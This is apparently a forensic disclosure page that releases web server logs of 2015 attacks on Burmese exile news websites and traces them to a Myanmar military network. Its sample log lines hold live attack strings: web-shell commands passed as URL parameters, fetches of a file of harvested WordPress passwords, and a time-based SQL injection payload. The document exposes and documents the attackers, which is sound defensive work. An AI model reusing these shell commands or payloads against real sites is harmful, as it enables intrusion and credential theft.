THE UNLEASHED ATTACK LOGS

The following files contain digital forensic data from the 1st July 2015 to the 7th December 2015.

DOWNLOAD LOG FILES
686771399fe320a57ff8d69c359f7a0c (5MB)

The webserver logs have been extracted from over 120GB of data logs related to the websites www.dvb.no, burma.irrawaddy.org, bur.irrawaddy.org and election-bur.irrawaddy.org.

This release includes close to 1 Million events where 57 transactions have been filtered out in a separate log file (summary_forensics) to facilitate the work of those interested to quickly cross check the timestamps. Special attention needs to be taken to translate the timezone of the log.

Apart from all traffic related to the Union of Hacktivists (UOH) from the military network 203.81.85.0/24, we are also including other connections from four different operators including Telenor Myanmar (OOREDOO), Yatanarpon Teleport, MPT and Redlink Communications.

On the 11th of November 2015, when the attackers discovered that we were monitoring them, they were trying to access the backdoors from 122.248.101.151 at the Yatanarpon Teleport.

Other providers, such as Cloudflare, that proxied burma.irrawady.org during the same time period, could also verify the validity of these log records.

We have also seen how backdoor URLs have been exchanged via Facebook, since Facebook has scrapped those URLs from Facebook communication.


 

#1 Filename: UNLEASHED_dvb_2015121207_203.81.85.2_attack_dscd.mil.mm.log
Target: www.dvb.no
Origin: AS9988 Myanma Posts and Telecommunications
Date:  12 December 2015
Description: Contains a pen testing attack (SQL injections) against www.dvb.no website from 203.81.85.2 with BlueCoat ID 3DD8B0CE676F0FB8 and Proxy Squid: dscd.mil.mm (squid/3.1.10)


#2 Filename: UNLEASHED_irrawaddy_201507-201511_noob.log
Target: burma.irrawaddy.org
Origin: AS133385 Telenor Myanar OOREDOO, AS131322 Yatanarpon Teleport Company Limited, AS9988 Myanma Posts and Telecommunications, AS132026 Redlink Communications Company Limited
Date: July- November 2015
Description: Contains all log entries from July – November 2015 from IP addresses that have accessed the backdoor (shell) noob.php at burma.irrawaddy.org.


#3 Filename: UNLEASHED_irrawaddy_201507-201511_203.81.85.x.log
Target: burma.irrawaddy.org
Origin: AS9988 Myanma Posts and Telecommunications(Military Network)
Date: July- November 2015
Description: Contains all the logs entries from network 203.81.85.0/24 from July – November 2015 that accessed the site burma.irrawaddy.org.


#4 Filename: UNLEASHED_irrawaddy_20151111_122.248.101.151.log
Target: burma.irrawaddy.org
Origin: AS131322 Yatanarpon Teleport Company Limited
Date: 11 November 2015
Description: Contains all the log entries of IP 122.248.101.151 when the attackers discover
that we are monitoring their traffic and try to access all the patched backdoors from AS131322 Yatanarpon Teleport Company Limited.


#5 Filename: UNLEASHED_irrawaddy_201507-201511_access_to_log-txt.log
Target: burma.irrawaddy.org
Origin: AS21837 Opera Software Americas LLC (Proxy), AS133385 Telenor Myanmar
AS131322 Yatanarpon Teleport Company Limited, AS54994 MILEWEB, INC. (Proxy)
AS9988 Myanma Posts and Telecommunications, AS132026 Redlink Communications Company Limited, AS32934 Facebook
Date: July – November 2015
Description: Contains all the log entries of the IP addresses that have accessed the log.txt file
that contains all the WordPress passwords collected by the backdoor.


#6 Filename: UNLEASHED_irrawaddy_201507-201511_summary_forensics.log
Target: burma.irrawaddy.org, bur.irrawaddy.org, election-bur.irrawaddy.org
Origin: AS21837 Opera Software Americas LLC (Proxy), AS133385 Telenor Myanmar
AS131322 Yatanarpon Teleport Company Limited, AS54994 MILEWEB, INC. (Proxy), AS9988 Myanma Posts and Telecommunications, AS132026 Redlink Communications Company Limited, AS32934 Facebook
Date: July- November 2015
Description: Aggregated summary of malicious activity.


MD5SUM

 

EVENTS AND NUMBER OF REGISTERED RECORDS

  • Access to log.txt: 128 Records
  • SQL injection from DSCD/DSA: 32,115 Records
  • Connections from military network (5 months): 869,434 Records
  • Access to Noob Backdoor: 820 Records
  • Digested Forensics: 57 Records
  • IP activity of 11th November when discovered (122.248.101.51): 393 out of 24,721
203.81.71.38 - - [03/Oct/2015:02:43:13 -0400] "POST //Backup/noob.php HTTP/1.1" 200 13834 
203.81.71.49 - - [11/Oct/2015:01:42:02 -0400] "POST //Backup/noob.php HTTP/1.1" 200 52898 
203.81.71.54 - - [21/Oct/2015:06:13:10 -0400] "POST //Backup/noob.php HTTP/1.1" 200 14829 
122.248.101.151 [11/Nov/2015:00:29:59] "GET /wp-content/wp-cache-config.php?1=ls%20-al" 
61.4.76.243 - - [11/Oct/2015:07:53:39 -0400] "POST //Backup/noob.php HTTP/1.1" 200 15479 
61.4.76.60 - - [12/Oct/2015:02:41:12 -0400] "POST //Backup/noob.php HTTP/1.1" 200 15401
111.84.193.91 - - [18/Oct/2015:03:35:56 -0400] "GET /phpinfo.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 
111.84.193.91 - - [18/Oct/2015:03:35:56 -0400] "GET /phpinfo.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2146 
111.84.193.91 - - [18/Oct/2015:03:40:44 -0400] "GET /phpinfo.php?1=ls HTTP/1.1" 200 13583 
111.84.193.91 - - [18/Oct/2015:03:41:32 -0400] "GET /phpinfo.php?1=ls%20-al%20wp-admin HTTP/1.1" 200 14325 
203.81.85.66 - - [05/Oct/2015:03:10:31 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 82
203.81.85.66 - - [11/Oct/2015:21:32:55 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 90
61.4.76.60 - - [11/Oct/2015:23:39:44 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 68
2a03:2880:11:1ff5:face:b00c:0:1 - - [11/Oct/2015:23:39:57 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 206 68
203.81.85.66 - - [11/Oct/2015:23:41:16 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 68
61.4.76.60 - - [12/Oct/2015:02:37:38 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 93
203.81.85.66 - - [12/Oct/2015:02:41:36 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 93
203.81.85.66 - - [12/Oct/2015:02:41:45 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 93
203.81.85.66 - - [12/Oct/2015:02:41:46 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 93
203.81.85.66 - - [12/Oct/2015:02:41:47 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 93
61.4.76.60 - - [12/Oct/2015:15:13:57 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 404 46116
61.4.76.60 - - [13/Oct/2015:02:31:33 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 200
61.4.76.60 - - [13/Oct/2015:16:22:15 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 203
61.4.76.60 - - [15/Oct/2015:00:49:54 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 246
61.4.76.60 - - [15/Oct/2015:01:10:58 -0400] "GET /wp-admin/user/log.txt? HTTP/1.1" 200 246
61.4.76.60 - - [15/Oct/2015:10:36:09 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 268
2a03:2880:2130:cff4:face:b00c:0:1 - - [15/Oct/2015:18:38:04 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 206 275
203.81.71.20 - - [16/Oct/2015:01:53:46 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 281
111.84.193.94 - - [16/Oct/2015:01:53:50 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 281
203.81.71.20 - - [16/Oct/2015:01:59:53 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 284
111.84.193.158 - - [16/Oct/2015:09:57:18 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 304
107.167.99.139 - - [16/Oct/2015:09:58:45 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 304
168.235.195.195 - - [16/Oct/2015:10:03:06 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 304
203.81.71.13 - - [16/Oct/2015:22:59:13 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 308
168.235.195.195 - - [17/Oct/2015:04:37:45 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 313
61.4.76.60 - - [17/Oct/2015:13:32:42 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
61.4.76.60 - - [17/Oct/2015:13:33:10 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
61.4.76.60 - - [17/Oct/2015:13:33:20 -0400] "GET /phpinfo.php?1=cat%20wp-admin/user/log.txt HTTP/1.1" 200 13649
61.4.76.60 - - [18/Oct/2015:01:58:37 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
61.4.76.60 - - [18/Oct/2015:02:09:36 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 431
203.81.71.46 - - [18/Oct/2015:02:12:05 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 431
203.81.71.46 - - [18/Oct/2015:02:24:11 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 436
203.81.71.46 - - [18/Oct/2015:03:15:13 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 438
203.81.71.54 - - [24/Oct/2015:01:28:27 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.71.54 - "" [24/Oct/2015:01:28:39 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.71.54 - - [24/Oct/2015:01:29:00 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.71.54 - - [24/Oct/2015:01:29:15 -0400] "GET /phpinfo.php?1=cat%20wp-admin/user/log.txt HTTP/1.1" 200 13759
203.81.71.54 - - [24/Oct/2015:01:29:48 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.71.54 - burma [24/Oct/2015:01:29:54 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.71.54 - Heavyrain [24/Oct/2015:01:30:19 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 401 381
203.81.85.66 - rcn [02/Nov/2015:02:28:47 -0500] "GET /wp-admin HTTP/1.1" 401 381
203.81.85.66 - smorozik [06/Nov/2015:03:34:34 -0500] "GET /wp-admin/user/log.txt HTTP/1.1" 200 804
203.81.85.66 - smorozik [06/Nov/2015:03:43:39 -0500] "GET /wp-admin/user/log.txt HTTP/1.1" 200 827
203.81.85.2 - smorozik [09/Nov/2015:08:10:54 -0500] "GET /wp-admin HTTP/1.1" 401 381
203.81.85.2 - rcn [09/Nov/2015:08:10:41 -0500] "GET /wp-admin HTTP/1.1" 401 381

SQL Injection attack against www.dvb.no including the dissection of relevant HTTP headers

203.81.85.2 - - [07/Dec/2015:06:51:54 +0000] "POST /archives/123450?yop-poll-nonce-49_yp5664f37802764=39d2a53934&yop_poll_answer%5b38%5d=318&yop_poll_tr_id=lw3z4MTF');select%20pg_sleep(6);%20--%20 HTTP/1.1" 403 232 "http://burmese.dvb.no:80/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25" "---" "MM" "AS9988 Myanma Posts and Telecommunications" "-x-" "unknown, 203.81.85.2" "-" "-" "-" "-" "-" "Via:1.1 dscd.mil.mm (squid/3.1.10)" "XBV:3DD8B0CE676F0FB8" "burmese.dvb.no" "tcp80" "-" "1.692" "-"
DOWNLOAD LOG FILES
686771399fe320a57ff8d69c359f7a0c (5MB)